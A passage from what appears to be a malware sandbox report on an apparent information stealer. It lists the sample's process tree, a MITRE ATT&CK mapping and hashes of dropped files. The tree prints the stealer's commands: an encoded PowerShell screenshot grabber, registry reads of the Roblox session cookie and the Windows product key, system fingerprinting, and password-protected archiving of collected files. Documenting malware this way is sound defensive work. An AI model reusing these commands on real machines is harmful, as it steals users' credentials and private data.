ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1996
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q05bsk4n\q05bsk4n.cmdline"
        5⤵
        
        PID:1776
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBCE.tmp" "c:\Users\Admin\AppData\Local\Temp\q05bsk4n\CSCA3F1A765871149599FF12FE08E05F54.TMP"
        6⤵
        
        PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2976
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3736
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4612
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4120
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5020
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4716
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3504
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4296
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41722\rar.exe a -r -hp"2024" "C:\Users\Admin\AppData\Local\Temp\nvK8o.zip" *"
    3⤵
    PID:4012
  - - C:\Users\Admin\AppData\Local\Temp\_MEI41722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI41722\rar.exe a -r -hp"2024" "C:\Users\Admin\AppData\Local\Temp\nvK8o.zip" *
      4⤵
      Executes dropped EXE
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2084

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI41722\VCRUNTIME140.dll

Filesize
94KB

MD5
a87575e7cf8967e481241f13940ee4f7

SHA1
879098b8a353a39e16c79e6479195d43ce98629e

SHA256
ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e

SHA512
e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\_bz2.pyd

Filesize
43KB

MD5
7170cba1a9d349a9899676a885b454af

SHA1
71f03d8c833329f840b2083ee082114442758fc7

SHA256
2b329971c66ca1d817e01520e687170f9e8a8a2b834eebf65674d14c0bb8d6b9

SHA512
078db324a9a5c61147ae3105a9741e00d198d68df40ad938810468e70a1bbaac8375885a46be3964c25e1540d67e6ca6273e676252d9d1e2067fef49a7651ed9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\_ctypes.pyd

Filesize
53KB

MD5
40f06d117408266b5cbd399926ac6db5

SHA1
083d43a7333d724483e745c8e666958022e648c5

SHA256
842c17ff15c55deb82f18d91bac496f9728f0b9b42ba3e59e6d147dd9775191e

SHA512
54dbf9e464f1ca912bda169fc02fe9b9e970a5b75bd5ffbd5d176307836a7d66ad51e46bb219f7c52de17cffc5d5d3d88f285ac49bffdfecec0dc5eade71b586

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\_decimal.pyd

Filesize
100KB

MD5
2957e6881415ce29fe537fc0a9398802

SHA1
6cdbaa6ac46a01eb465d46f3aae3a849fcb467e7

SHA256
bc3ed7dcdc7d924eff2c973bc42b4554df77e2a8b447c9bae2255ca12c9eb7f1

SHA512
acd765262ddd149efd0b266a9773466f22a337dcf8b68f47528b881a488badee3e286ad4015f7c5a81c955b3862aa2e241a33c434fbbb67e87d94af7ef73dba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\_hashlib.pyd

Filesize
30KB

MD5
eb60987a9fbaab6cd09f375007d3f818

SHA1
152dda528f4590e20806642d45d54ebd2b684dfb

SHA256
4e522e24c6022f9190d5cd2e6ffe430b7dfa910daf5c9573443139ed5108aaac

SHA512
172d1b1c8c152a0d68b23f8cd60dd2dd7b7d56c748efec5cc20cd79c9b0e669ffb0a49812f755fbb1928fe64a67c4a0a41bbab0abb5835595cce30416051953b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\_lzma.pyd

Filesize
81KB

MD5
74231122ddc358d47144ab20826e387b

SHA1
a8efa5cd2ce1b69ac13e7a2ad53f6b5519671a4d

SHA256
dcd07e7f4552fa322d1b7654a05e26b438b289ce2b9328a1ed4154e0b9051da4

SHA512
aae771b00849ac9d2eb3fa9aaad167d60a95236454b2a5c9b0c986359d918a44b25556f63d8e4879364bbfbbc06d460dadc2fd3a68a6e1920e14e2c81d53c354

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\_queue.pyd

Filesize
21KB

MD5
a476730f12ba5f8243aaf7f63f8cc830

SHA1
759f23bab96ee6d65c326661cc9d4d9934c237bd

SHA256
9bb9890630ba0db29c2186622e9351a1389019683131cc25db32289cd57c4a2d

SHA512
cd97526961208e4c8646aa003b0594968c12586f2996af030c5d475f7eae790e045e5e259a2c0b3d6cac29bb362f9e5f2fcd0b527cd47088b6d961d6cb0e9c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\_socket.pyd

Filesize
38KB

MD5
7cc1dcc1c76edbb6509e13990d9f768b

SHA1
434901d28200cfead802132809827c49f1a56986

SHA256
6207ce989a75f78e63bc5b5f12b66bf98adb5f521f5c9920ab77f2b6a73d4900

SHA512
659c20b3300bbb0a00fdaf3de46d107b415323121140bbe1a5e5653d4732d0d4f6a67d8497bda54de068fa1af9ad31f0c52e7797d4124cdff1fa3ac196138331

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
8805de8aead10a48193b54f882a7763a

SHA1
b4e55947787eb9cdb5998ee1b77c3bd14a35accf

SHA256
22b0d0412c274a04d11d7fd3f6545eff245e6f032e21b86d920c2844dd1007c6

SHA512
284d835a01a0c98b16f717e0eaf962a559ec2158a673402ab29b96ec37785728bc70496c07d0c683c51a7f1a3880660de6ef52da326aec641578fb7cfb19f458

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
1754ecb52a0c9fb6f11c43476975be9e

SHA1
93045ea061f23421d61b14ab2b89eb618c0e6daf

SHA256
631a106755f13a78032d7c17cd19c5185fe89d93fda2ac108c4f53e27dcdecdb

SHA512
4bd61029d4fe1a55d2a89fbc900107751a0753434d8ea25cc947131205c7f610b44e3e7bd2f2c5fda4db0ae6aac3bb0ec6a4c0b5ae1c602c597e8bf1328d244e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-debug-l1-1-0.dll

Filesize
21KB

MD5
31b55653d51de75f30be2eea85aead0f

SHA1
b9d3501a06d37110c281fafb433dd2fc26189447

SHA256
1ce185afeea0a30a12b496d95df395c18bd0e99570c0ac3126758476d4b6aea0

SHA512
0bb69ccf98ad9db6fd1e2ec4a2a436f2da42c1e949c8941f780515787a1a560f696aed1a9faf1b3fa2a96fd59f3c51f6e9a59186e1485b47687828a0cab2140a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
a575281e93dcdc2f95857b7e2b365361

SHA1
379a88481d2d2efa2e6e741add7a82b217865b87

SHA256
cdbc9ee30658188fd9af68ad52b5d8e7f59111191b0681ec2ed9095d9c85ebee

SHA512
44f4409cd8eca2c18da44e99ecc87c7dcd20b30f1ee9983bb504cfa4121e95521d11a2bacc63d9fe18008ba629bc464d3c715b9720603813ecd3b6098a395906

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-fibers-l1-1-0.dll

Filesize
21KB

MD5
b4c1a9ef2cf923a81969faf2f74e5c18

SHA1
84d4f2141b89afac5d8d14277b79c4f14e6cbb3c

SHA256
938a52984e7e9ffeef350a794907639d453e346d5bdc0aec8c1360d040cc672a

SHA512
c4402b4a5bdd751bada7a96d48d7a3679447fd455547a874e95a27b0b7686d89ddecad2a5097daa7d0e305557514219bcc6e126fefcad52c3ff16ac69368f4e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
8142799f92638d67267278d2fcab85e0

SHA1
122da2ce08042e8484e2584cba30fe528dd3b94d

SHA256
f36025fd0715ec893c112f06472072c565385b8c5fa675cce5b4a9158bfb87e9

SHA512
1d71763f14ff6178cf17f71fdfb47a46522e20c92ca3b86d1b722f9a704354f3b0e7a73ab6b891d531bed8c9db844c677c4f9dbcddced27487e2439d654ce7a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
75c8a3c1dfe2096f1a2c6ba51de7196f

SHA1
eb17720383791d75ccc2ed729900c1e8e8165504

SHA256
3d95961590fe6da5c569bcb0a54651488e70dd7b15c257e1b9faf8a3cc0e63e4

SHA512
8c6af5c49a321d60b14032780bf6d93a51ed7fe97940e06dfb251d295f51f2788cd7931a848cea94607d81acb9bb225086dd879159e67cda0c355173e69543ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-file-l2-1-0.dll

Filesize
21KB

MD5
855bea02e0a624407c36b109b841db59

SHA1
d812734104a7fcce9ef86ba9239d106ef8d27395

SHA256
c6515fb573cd8190ebc401aab4646069066205ee9eeca548ae5ddbec3633336b

SHA512
23a14f6c86a8f986322dd1f7efee0b9a20e12e6d141994d3fd165d0df22513d63efb3fab8945879466b053f09fe0d2153c183c1d738530844eec465318e94ff1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-handle-l1-1-0.dll

Filesize
21KB

MD5
5f0f6443699fb844cd2a6684ce279b6d

SHA1
ccc04dad19cfdd7f3cf895025d038e0c509881c6

SHA256
523b4c1528aab62c5f8622e4e2c4a4ba0df43114098a05f0c58c69c716c42626

SHA512
bd03582d208403f245e24d47a8f2ac818f5853ca9438912af718386b48eedf4b8d01a3579e67a46b7214fc343e06301d54148893ea00ae822eee95ade448674d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-heap-l1-1-0.dll

Filesize
21KB

MD5
c5de5376fe71ca643e633505209da913

SHA1
83ac568295bacc264e40586306f2facb2e778304

SHA256
4fff338c18ab8a1a37d1190e3b9edcca55afa86b0ba0f97d87c4c841e4e29678

SHA512
2c04fb85b1b5c047d456b61b178aa486c9a8801408edb8dbd20fef4e1e125d140a30ee6f40dc0e850cd717529fd0e7bcd3e88a0f018ff1602beae4db01df1458

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
26dd73913f6487700025e760df6402ee

SHA1
055e26cc1b985f0215a0eb5e6153e6cc9f76f2b0

SHA256
841aa4632552c47b43d453968da2c8d0861b1eb776d530a4e985d0290516d6c8

SHA512
d073e118f08216d6c7b39ddfb089353377032080f8e0447a66abf62f97939084c2ca957ce1d65ec3479161cf3385c5b82cc7000a29a2d856f319ef9115d550a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
21KB

MD5
9bfa838217a723d82f2139bd9fa92169

SHA1
e59d149cb6e7149768305a174a14531406c79686

SHA256
e989c62edade6b3333d798e0481f4c2ec08f7d2a0c47acfcca2a869cd4b68a1f

SHA512
55deaf735ec62bf652364d3a281a98516e967a1f6fdc5d691864766b1e4cf2e31ab64f48dfc79eb89bb3cd1ff7e59af5e6eb22fcbe0761e708b5c5035b96b62a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
7f629d273ac801725d19df76990a68df

SHA1
dc6ce7553e3ccecbc2f74cccb6760a9fae910594

SHA256
945dacfe53f62d83acd0537a6712658558faafb18f68b76b88127db78482fd8f

SHA512
af51a9f8704d909185601c642d966cf99f53d2867dd4c5326f602ce279fcde916f9ef1d458740242c02078f9bc8867d8cb8a41332590c45983ddf349d1cfb05e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
e80ab3c9dfd2574944f7e823b99d9ca3

SHA1
3b22f5cfaaecde9890dafbadc40a862215a62e71

SHA256
a505bdf2e4dfd5120de230fd9d159ef75aa00fb3f98e24d259f5c0a456713c74

SHA512
8f756d323932b6db5b29c0b50a313fef7417dfe7173bf21dce756de7ec62235812e00d321cdfd0cc20e88b21a9fd6edd8660df68ac87052f6e7fc5549c3fac81

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
e6afcee6449426ec7aade8946d995f00

SHA1
e23ca56ec0e593c72d5f409707368fac5531a7ab

SHA256
b26de5e517b05e10ee34fdf4996f82c465668670329e7f19d21f39a7e39011e7

SHA512
a4f08b3115e5bb60cacabd4801577b52fa25d33803b1b7b6ac9e8663ed4aec62b745362bd7ea28186d18a77362ea0f5fa452200d4744535006300b108ce8e841

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
162689d6edafcb3eb00fb50d01ee5287

SHA1
30f20bec95041f904fa2f566700d1dff436d5021

SHA256
32d11f07156248c7906027e0f17e93e51de848f136e6d3fd0d4f9d1ffb2c70da

SHA512
1f7730a291281db1c47a374eef5080c7f4ef47eb51075b05f148545d14ff05fe03510b9b11b807ef32bdee6ec24bc386f5e2a032bb5e5faa8d10375de32af0e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
953139610362f102b41b125ea7208070

SHA1
ee5ae26c8909923691f6673cd2385c567b9339c0

SHA256
562e2619e1e685080faf2122c12ae3c35202ce34ce8330d1ff0a3b566095fd38

SHA512
e7d72b31426438a045521f84b262f2f8093f63438a10893777f7660bb9e570794a2e278edfaf697d3888b12a88854f4c6c4028310b278e60a3e2abf328ba5272

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
6362e38d6c8138711da8f3be9bcc72cd

SHA1
b0827e51f1a45cdfed76e7636ea334255d7ddbeb

SHA256
73fabc60a9b24c1eb65ec886a59a190046af5853800572df1d48634417a15729

SHA512
bac37bf61221355a1b43a7e7b3a65ff6d08790898e7e9719f2a776ee55db0cfe036d721d216bb95454dd1375c322298eea54fba2054d9a41e3aad6d60ec41507

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-profile-l1-1-0.dll

Filesize
21KB

MD5
4649d1ad31dd375bfaea35c9423f1d96

SHA1
a4736638f443aca260205dfddea3635ee2380a26

SHA256
2401cc9407ebb1fa60ddf520d422ec1eefec050dd9871554756c869c9b730558

SHA512
1f98f8945b3f3ac852090a559095c95f36ff234672e871c95c2a8447e321890f5e6b244ee67d3e24a09cce2c809848e2d19fc2c7d54ace97ee0ba5d6f396a8d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
21KB

MD5
251d9a3f3ec2e5a8997ce8d7450e443f

SHA1
f6cac92e67b976f6b480c530b501e9f0f18e7d81

SHA256
b5a61cd60ec9088ee27bf61d37c55abc9d6db3f722616d74fc191cf671a4902a

SHA512
cf956d4fd0713970e050a1259c5e3495125a64e8a75d26f8b3a6c9b64954f0c1e5e349352443652c3bb21feb2ffec4145eb58cbfc16e2600d1d23ee4ca6425c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-string-l1-1-0.dll

Filesize
21KB

MD5
575eba56aa4c2e409d643f719cd1dbba

SHA1
86a8b08c70a5b095b603211a706148ca266951a9

SHA256
7e97fbf5cee26ab01227d564f023337736310868c1cf23920e4dceeeb1c11701

SHA512
67778ef6ea653970dd17d4bf4272a408a7626f8f994cd1a781687f9a7398765df6e0079663ca66e9be80a324ec467c1145f8b6e49ccf52cd6fb8bf8bfcdb2f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41722\api-ms-win-core-synch-l1-1-0.dll

Filesize
21KB

MD5
